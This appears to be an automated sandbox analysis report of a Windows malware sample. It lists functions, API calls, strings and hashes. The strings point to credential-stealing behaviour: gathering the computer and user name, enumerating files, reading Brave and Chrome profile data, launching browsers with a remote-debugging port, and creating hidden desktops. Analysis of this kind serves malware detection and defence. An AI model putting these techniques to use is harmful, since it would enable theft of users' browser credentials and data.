Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169

Function 02E3A365 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02E3A3B6

Memory Dump Source

Source File: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E39000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e39000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: dbbfc1465a6b0496884b622fcb84c9410759760c3be758dc18a1cb9722a1f333
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 29112D79A40208EFDB01DF98C989E98BBF5AF08351F0580A4F9489B361D371EA90DF80

Non-executed Functions

Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
FindClose.KERNEL32(000000FF), ref: 0040C8BB

Strings

\Brave\Preferences, xrefs: 0040C1C1
Brave, xrefs: 0040C0E8
Preferences, xrefs: 0040C104
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
Google Chrome, xrefs: 0040C6F8
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
Opcode Fuzzy Hash: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413B1C
FindFirstFileA.KERNEL32(?,?), ref: 00413B33
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

%s\%s\%s, xrefs: 00413C9A
%s\%s, xrefs: 00413BCA
%s%s, xrefs: 00413CFD
q?A, xrefs: 00413ED2, 00413E95, 00413DB9, 00413B59, 00413DBC, 00413E98
%s\*, xrefs: 00413B10
%s\%s, xrefs: 00413CBF

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
API String ID: 1125553467-4052298153
Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66

Function 048CC0A7 Relevance: 44.2, APIs: 29, Instructions: 727fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 048CC12C
StrCmpCA.SHLWAPI(?,00421454), ref: 048CC19A
StrCmpCA.SHLWAPI(?,00421458), ref: 048CC1B0
FindNextFileA.KERNEL32(000000FF,?), ref: 048CCB10
FindClose.KERNEL32(000000FF), ref: 048CCB22

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
Instruction ID: a03d522dce438bc464af791a4a44dbd3b31fc22e789497511afc5c49990287bf
Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
Instruction Fuzzy Hash: 7F5272729011189BDB18FB64DC94EEE7339AF54305F504AADA50BE6090EFB4BB48CF52

Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414B7C
FindFirstFileA.KERNEL32(?,?), ref: 00414B93
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

%s\%s, xrefs: 00414BF4
%s\%s, xrefs: 00414C4B
%s\*, xrefs: 00414B70
-SA, xrefs: 00414DE8, 00414DAB, 00414D54, 00414BA8, 00414D57, 00414DAE

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$-SA
API String ID: 180737720-309722913
Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

Function 048D3D67 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 048D3D83
FindFirstFileA.KERNEL32(?,?), ref: 048D3D9A
lstrcat.KERNEL32(?,?), ref: 048D3DEC
StrCmpCA.SHLWAPI(?,00420F58), ref: 048D3DFE
StrCmpCA.SHLWAPI(?,00420F5C), ref: 048D3E14
FindNextFileA.KERNEL32(000000FF,?), ref: 048D411E
FindClose.KERNEL32(000000FF), ref: 048D4133

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID:
API String ID: 1125553467-0
Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
Instruction ID: e817fe46c3d938f275d9e9890e2455ba5f6f466c36713db74b920947e98ee748
Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
Instruction Fuzzy Hash: D1A16371A012189BDB34DFA4DC84FEE7379BF58700F444A89A60DD6180EB75AB84CF62

Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
HeapAlloc.KERNEL32(00000000), ref: 004147D7
wsprintfA.USER32 ref: 004147F6
FindFirstFileA.KERNEL32(?,?), ref: 0041480D
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
FindClose.KERNEL32(000000FF), ref: 004148F0
lstrcatA.KERNEL32(?,02EB23C0,?,00000104), ref: 00414915
lstrcatA.KERNEL32(?,02EB5D30), ref: 00414928
lstrlenA.KERNEL32(?), ref: 00414935
lstrlenA.KERNEL32(?), ref: 00414946

Strings

%s\*, xrefs: 004147EA
%s\%s, xrefs: 0041486B

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95

Function 048D4DC7 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 048D4DE3
FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA
StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
FindClose.KERNEL32(000000FF), ref: 048D5049

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
Instruction ID: fcd7d2334959c4d155559a81bf2da8afd9228f9366720ddec1e843fdd1cb10ba
Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
Instruction Fuzzy Hash: 8B616572D01218ABDB24EBA4DD48FEA737DAF48705F40468DB609D6080FB75AB84CF91

Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409E47

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

wsprintfA.USER32 ref: 00409E7F
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
memset.MSVCRT ref: 00409EED
lstrcatA.KERNEL32(00000000,?), ref: 00409F03
lstrcatA.KERNEL32(00000000,?), ref: 00409F17
lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
memset.MSVCRT ref: 00409F3D
lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
memset.MSVCRT ref: 00409F9C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
Sleep.KERNEL32(00001388), ref: 0040A013
CloseDesktop.USER32(00000000), ref: 0040A060

Strings

D, xrefs: 00409FA4

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55

Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414113
FindFirstFileA.KERNEL32(?,?), ref: 0041412A
StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
FindClose.KERNEL32(000000FF), ref: 004142D1

Strings

%s\%s, xrefs: 00414107

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59

Function 048D4A27 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 048D4A37
RtlAllocateHeap.NTDLL(00000000), ref: 048D4A3E
wsprintfA.USER32 ref: 048D4A5D
FindFirstFileA.KERNEL32(?,?), ref: 048D4A74
StrCmpCA.SHLWAPI(?,00420FAC), ref: 048D4AA2
StrCmpCA.SHLWAPI(?,00420FB0), ref: 048D4AB8
FindNextFileA.KERNEL32(000000FF,?), ref: 048D4B42
FindClose.KERNEL32(000000FF), ref: 048D4B57
lstrcat.KERNEL32(?,006D6F24), ref: 048D4B7C
lstrcat.KERNEL32(?,006D6C2C), ref: 048D4B8F
lstrlen.KERNEL32(?), ref: 048D4B9C
lstrlen.KERNEL32(?), ref: 048D4BAD

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID:
API String ID: 671575355-0
Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
Instruction ID: 42bfd560de2aefe5ee7539068bf06796506cb50ca131ed2ec4a3de6dbcf72354
Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
Instruction Fuzzy Hash: 685176B1945218ABDB24EB74DC88FED737DAF58700F404A89F649D6090EB74AB84CF52

Function 048D4357 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 048D437A
FindFirstFileA.KERNEL32(?,?), ref: 048D4391
StrCmpCA.SHLWAPI(?,00420F94), ref: 048D43BF
StrCmpCA.SHLWAPI(?,00420F98), ref: 048D43D5
FindNextFileA.KERNEL32(000000FF,?), ref: 048D4523
FindClose.KERNEL32(000000FF), ref: 048D4538

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
Instruction ID: 705330f36df985c4dbf9f21fcfc56c0db32f30771ea7e3440a10552be50f78a9
Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
Instruction Fuzzy Hash: E551B8B1905218ABDB24EB74DD84EEA737DBB54304F404BCDB649D2050EBB5AB84CF51

Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EE3E
FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
FindClose.KERNEL32(000000FF), ref: 0040F3C3

Strings

%s\*.*, xrefs: 0040EE32

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59

Function 048FF4FF Relevance: 17.4, Strings: 13, Instructions: 1151COMMON

Download Yara Rule

Strings

2-by, xrefs: 048FF55D
te k, xrefs: 048FF81B
expa, xrefs: 048FF8C8
te k, xrefs: 048FF9A5
nd 32-by, xrefs: 048FF91B
